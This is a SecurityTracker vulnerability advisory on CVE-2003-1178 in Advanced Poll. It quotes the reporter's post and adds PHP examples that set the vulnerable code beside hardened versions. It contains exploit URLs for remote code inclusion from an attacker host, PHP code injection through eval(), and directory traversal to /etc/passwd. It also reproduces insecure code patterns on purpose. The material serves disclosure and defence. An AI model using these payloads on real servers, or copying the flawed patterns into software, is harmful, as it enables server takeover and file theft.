SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
Category:  Application (Generic)  >  Advanced Poll
Vendors:  Chi Kien Uong
Advanced Poll Include File Error Lets Remote Users Execute Arbitrary PHP Code and Operating System Commands
SecurityTracker Alert ID:  1008005
SecurityTracker URL:  http://securitytracker.com/id?1008005
CVE Reference:  CVE-2003-1178
OSVDB Reference:  2743
Updated:  Oct 11 2006
Original Entry Date:  Oct 27 2003
Impact:  Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 2.0.2 (Textfile Version)
Description:  A file include vulnerability was reported in Advanced Poll (2.0.2, Textfile Version). A remote user can cause the target server to include and execute PHP code from a location the user chooses, and thereby run arbitrary commands on the server.

Frog-m@n reported that several scripts emulate register_globals by copying every GET, POST and cookie parameter into a PHP variable of the same name ($$name = $value) and then build the paths passed to require and include from two of those variables, $include_path and $base_path. A remote user who supplies those parameters can therefore point the include at a location of their choice, including a remote URL, so that PHP code hosted there is fetched and executed by the target server. The emulation loop only runs when $PHP_SELF is not already set, i.e. when register_globals is off. The entry points that compute the path variable before that loop (booth.php, png.php, poll_ssi.php, popup.php, and the scripts in /admin/ other than common.inc.php) are therefore reported to be exploitable only with register_globals off, since with it on the loop is skipped and the variable keeps its computed value; admin/common.inc.php, requested directly, is reported to be exploitable with register_globals on or off. A further variant, admin/common.inc.php?base_path=..&pollvars[lang]=../../../file/to/view, uses directory traversal to include a local file. Separately, comments.php passes the id, template_set and action parameters through eval() inside a double-quoted string, so a value containing a double quote injects PHP code when magic_quotes_gpc is off, and misc/info.php exposes phpinfo().

A demonstration exploit URL is provided:

http://[target]/admin/common.inc.php?base_path=http://[attacker]

The above URL will reportedly cause the 'http://[attacker]/lang/english.php' file to be included and executed on the target system. (The Source Message writes the parameter as 'basepath'; the code it quotes reads the variable as $base_path.) For the remote variant to work, the target's PHP must be permitted to include URLs (allow_url_fopen in PHP 4; from PHP 5.2 also allow_url_include, which defaults to off) and the attacker's server must return the file as text rather than execute it. A server with URL includes disabled remains exposed to the local file include via directory traversal.

Several other demonstration exploits are described in the Source Message.
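The include flaw described above, reproduced as an added example next to a hardened version. This is not Advanced Poll's or the reporter's code; the install directory POLL_ROOT, the language allowlist and the function names are assumptions, and it is written for PHP 8. The vulnerable function returns the path the script would hand to include() instead of including it, so the example runs safely offline.

```php
<?php
// Added example, not Advanced Poll's code. Reproduces the pattern quoted in this
// advisory (every request parameter copied into a same-named variable, then
// $base_path and $pollvars[lang] used to build an include path) beside a
// hardened equivalent. POLL_ROOT, the allowlist and the function names are
// assumptions; requires PHP 8.

declare(strict_types=1);

const POLL_ROOT = '/var/www/poll';   // assumed install directory

// Vulnerable: mirrors booth.php / admin/common.inc.php. Returns the path the
// script would pass to include() instead of including it, so it runs safely.
function vulnerableLangInclude(array $request): string
{
    $base_path = POLL_ROOT;          // what the calling script set before the loop
    $pollvars  = [];
    // register_globals emulation: the request chooses the variable NAME as well
    // as the value, so base_path=http://attacker or pollvars[lang]=../../x
    // silently overwrite the locals above.
    foreach ($request as $name => $value) {
        $$name = $value;
    }
    // The real code includes this only if file_exists() succeeds and otherwise
    // falls back to "$base_path/lang/english.php" (which is why the remote
    // variant ends up executing http://[attacker]/lang/english.php).
    $lang = $pollvars['lang'] ?? 'english.php';
    return "$base_path/lang/$lang";
}

// Hardened: the base directory is a constant, exactly one known key is read
// from the request, and its value must be on an allowlist of language files.
function safeLangInclude(array $request): string
{
    static $allowed = ['english.php', 'german.php', 'french.php'];  // assumed set
    $lang = (string)($request['pollvars']['lang'] ?? 'english.php');
    if (!in_array($lang, $allowed, true)) {
        $lang = 'english.php';       // unknown value: fall back, never interpolate it
    }
    return POLL_ROOT . '/lang/' . $lang;
}

// Defence in depth for any remaining dynamic include: accept only an absolute
// path that normalises to something below $dir. URLs and relative paths fail
// the first test; traversal fails the second. String-only so it works without
// the files existing; realpath() is stricter on a live install.
function isBelow(string $path, string $dir): bool
{
    if ($path === '' || $path[0] !== '/') {
        return false;
    }
    $parts = [];
    foreach (explode('/', $path) as $p) {
        if ($p === '' || $p === '.') {
            continue;
        }
        if ($p === '..') {
            array_pop($parts);
            continue;
        }
        $parts[] = $p;
    }
    $norm = '/' . implode('/', $parts);
    return str_starts_with($norm, rtrim($dir, '/') . '/');
}

// Constructed requests, as PHP parses the query strings from the advisory
$remote    = ['base_path' => 'http://attacker.example'];
$traversal = ['base_path' => '..', 'pollvars' => ['lang' => '../../../etc/passwd']];
$benign    = ['pollvars' => ['lang' => 'german.php']];

foreach (['remote' => $remote, 'traversal' => $traversal, 'benign' => $benign] as $case => $req) {
    $bad  = vulnerableLangInclude($req);
    $good = safeLangInclude($req);
    printf("%-9s vulnerable: %-45s below root: %s\n", $case, $bad, isBelow($bad, POLL_ROOT) ? 'yes' : 'no');
    printf("%-9s hardened:   %-45s below root: %s\n", $case, $good, isBelow($good, POLL_ROOT) ? 'yes' : 'no');
}
```

Run it with the php command-line interpreter. The vulnerable function yields http://attacker.example/lang/english.php and ../lang/../../../etc/passwd for the two hostile requests, neither of which passes isBelow(); the hardened function returns a file under POLL_ROOT/lang for every input. Disabling allow_url_fopen (and allow_url_include on PHP 5.2 or later) blocks only the remote case, which is why the path must also be constrained in code.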

Impact:  A remote user can execute arbitrary PHP code, including operating system commands, on the target system. The code will run with the privileges of the target web server.
Solution:  No vendor solution was available at the time of this entry. An unofficial patch is available at:

http://www.phpsecure.info

Vendor URL:  proxy2.de/scripts.php
Cause:  Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)
Reported By:  "Frog Man" <leseulfrog@hotmail.com>
Message History:   None.


 Source Message Contents

Date:  Sat, 25 Oct 2003 16:04:55 +0200
From:  "Frog Man" <leseulfrog@hotmail.com>
Subject:  [VulnWatch] Advanced Poll : PHP Code Injection, File Include, Phpinfo

 

Information :
°°°°°°°°°°°°°
Language : PHP
Product : Advanced Poll
Version : 2.0.2 Textfile
Website : http://www.proxy2.de
Problems :
- PHP Code Injection
- File Include
- Phpinfo


PHP Code/Location :
°°°°°°°°°°°°°°°°°°°

comments.php :

-----------------------------------------------------------------------------------------------------
[...]
$register_poll_vars = array("id","template_set","action");
for ($i=0;$i<sizeof($register_poll_vars);$i++) {
  if (isset($HTTP_POST_VARS[$register_poll_vars[$i]])) {
    eval("\$$register_poll_vars[$i] = \"".trim($HTTP_POST_VARS[$register_poll_vars[$i]])."\";");
  } elseif (isset($HTTP_GET_VARS[$register_poll_vars[$i]])) {
    eval("\$$register_poll_vars[$i] = \"".trim($HTTP_GET_VARS[$register_poll_vars[$i]])."\";");
  } else {
    eval("\$$register_poll_vars[$i] = '';");
  }
}
[...]
-----------------------------------------------------------------------------------------------------

booth.php, png.php :

---------------------------------------------------------------
<?php
$include_path = dirname(__FILE__);
if ($include_path == "/") {
  $include_path = ".";
}
if (!isset($PHP_SELF)) {
  global $HTTP_GET_VARS, $HTTP_POST_VARS, $HTTP_SERVER_VARS;
  $PHP_SELF = $HTTP_SERVER_VARS["PHP_SELF"];
  if (isset($HTTP_GET_VARS)) {
    while (list($name, $value)=each($HTTP_GET_VARS)) {
      $$name=$value;
    }
  }
  if (isset($HTTP_POST_VARS)) {
    while (list($name, $value)=each($HTTP_POST_VARS)) {
      $$name=$value;
    }
  }
  if(isset($HTTP_COOKIE_VARS)){
    while (list($name, $value)=each($HTTP_COOKIE_VARS)){
      $$name=$value;
    }
  }
}
require $include_path."/include/config.inc.php";
require $include_path."/include/class_poll.php";
[...]
---------------------------------------------------------------

poll_ssi.php, popup.php :

----------------------
include "./booth.php";
----------------------

admin/common.inc.php :

---------------------------------------------------------------
[...]
if (!isset($PHP_SELF)) {
  $PHP_SELF = $HTTP_SERVER_VARS["PHP_SELF"];
  if (isset($HTTP_GET_VARS)) {
    while (list($name, $value)=each($HTTP_GET_VARS)) {
      $$name=$value;
    }
  }
  if (isset($HTTP_POST_VARS)) {
    while (list($name, $value)=each($HTTP_POST_VARS)) {
      $$name=$value;
    }
  }
  if(isset($HTTP_COOKIE_VARS)){
    while (list($name, $value)=each($HTTP_COOKIE_VARS)){
      $$name=$value;
    }
  }
}
$pollvars['SELF'] = basename($PHP_SELF);
unset($lang);
if (file_exists("$base_path/lang/$pollvars[lang]")) {
  include ("$base_path/lang/$pollvars[lang]");
} else {
  include ("$base_path/lang/english.php");
}
[...]
---------------------------------------------------------------

In the /admin/ directory, in the files :
- index.php
- admin_tpl_new.php
- admin_tpl_misc_new.php
- admin_templates_misc.php
- admin_templates.php
- admin_stats.php
- admin_settings.php
- admin_preview.php
- admin_password.php
- admin_logout.php
- admin_license.php
- admin_help.php
- admin_embed.php
- admin_edit.php
- admin_comment.php

------------------------------------
[...]
$include_path = dirname(__FILE__);
$base_path = dirname($include_path);
require "./common.inc.php";
[...]
------------------------------------

misc/info.php :

-------------------------
<html>
<head>
<title>PHP Info</title>
</head>
<body bgcolor="#3A6EA5">
<?php phpinfo(); ?>
-------------------------


Exploits :
°°°°°°°°

- if magic_quotes_gpc=OFF :
http://[target]/comments.php?id=";[PHPCODE]//&template_set=";[PHPCODE]//&action=";[PHPCODE]//
or with a POST form or cookies.

- This will only work if register_globals=OFF (this is not an error...) :
http://[target]/booth.php?include_path=http://[attacker]
(or with png.php, poll_ssi.php, popup.php)
will include the files :
http://[attacker]/include/config.inc.php
and
http://[attacker]/include/class_poll.php

- This will work if register_globals=OFF OR ON :
http://[target]/admin/common.inc.php?basepath=http://[attacker]
will include the file http://[attacker]/lang/english.php.
The same hole can be found, in the /admin/ directory, in the files :
- index.php
- admin_tpl_new.php
- admin_tpl_misc_new.php
- admin_templates_misc.php
- admin_templates.php
- admin_stats.php
- admin_settings.php
- admin_preview.php
- admin_password.php
- admin_logout.php
- admin_license.php
- admin_help.php
- admin_embed.php
- admin_edit.php
- admin_comment.php
but only with register_globals=OFF.
And, with register_globals=OFF and with all the files above again, the url
http://[target]/admin/common.inc.php?base_path=..&pollvars[lang]=../../../file/to/view
will include the file http://[target]/admin/../../../file/to/view

- http://[target]/misc/info.php will show the phpinfo().


Solution/More details :
°°°°°°°°°°°°°°°°°°°°
Both patch and details can be found on http://www.phpsecure.info .


Credits :
°°°°°°°°
frog-m@n
http://www.phpsecure.info
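The comments.php injection quoted in the message, as an added example that is not part of the original post or of Advanced Poll. It rebuilds the eval() pattern beside the plain assignment that should replace it and shows what magic_quotes_gpc did to the payload. The $marker variable, the request array and the template allowlist are constructed for the demonstration; it requires PHP 8.

```php
<?php
// Added example, not Advanced Poll's or the reporter's code. Reproduces the
// comments.php pattern quoted above (request values spliced into PHP source and
// eval()'d) beside the plain assignment that should replace it. The payload,
// the $marker variable and the request array are constructed; requires PHP 8.

declare(strict_types=1);

const REGISTER_POLL_VARS = ['id', 'template_set', 'action'];

// The statement comments.php builds for one variable. Kept separate so the
// effect of a value on the generated source can be inspected without running it.
function generatedStatement(string $var, string $value): string
{
    return "\$$var = \"" . trim($value) . "\";";
}

// Vulnerable: evaluates that statement. A value of  ";<php>//  closes the
// string literal, appends <php> and comments out the trailing quote, exactly
// as in the exploit URL above. Returns the registered variables plus anything
// the evaluated code created.
function registerVulnerable(array $request): array
{
    foreach (REGISTER_POLL_VARS as $var) {
        if (isset($request[$var])) {
            eval(generatedStatement($var, (string)$request[$var]));
        } else {
            eval("\$$var = '';");
        }
    }
    unset($var, $request);   // leave only what the script and the payload defined
    return get_defined_vars();
}

// Hardened: no source generation at all. The value is data and is assigned as
// data; template_set is additionally restricted to known template names.
function registerSafe(array $request, array $allowedTemplates = ['default']): array
{
    $vars = [];
    foreach (REGISTER_POLL_VARS as $var) {
        $vars[$var] = isset($request[$var]) ? trim((string)$request[$var]) : '';
    }
    if (!in_array($vars['template_set'], $allowedTemplates, true)) {
        $vars['template_set'] = 'default';
    }
    return $vars;
}

// Constructed request equivalent to
//   ?id=";$marker='injected';//&template_set=default&action=view
$payload = [
    'id'           => '";$marker=\'injected\';//',
    'template_set' => 'default',
    'action'       => 'view',
];

echo "generated source, magic_quotes_gpc=Off: ", generatedStatement('id', $payload['id']), "\n";
// With magic_quotes_gpc=On the quote arrives as \" and stays inside the literal,
// which is why the reporter's first exploit needs magic_quotes_gpc=Off.
echo "generated source, magic_quotes_gpc=On:  ", generatedStatement('id', addslashes($payload['id'])), "\n\n";

var_export(registerVulnerable($payload));   // includes 'marker' => 'injected'
echo "\n";
var_export(registerSafe($payload));         // 'id' holds the raw text, nothing was executed
echo "\n";
```

Run it with the php command-line interpreter. registerVulnerable() returns an array that contains a 'marker' entry the request was never supposed to be able to create, while registerSafe() returns only the three declared keys with the payload stored as an ordinary string. The fix is not better escaping of the generated source but not generating source from request data at all.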








Copyright 2006, SecurityGlobal.net LLC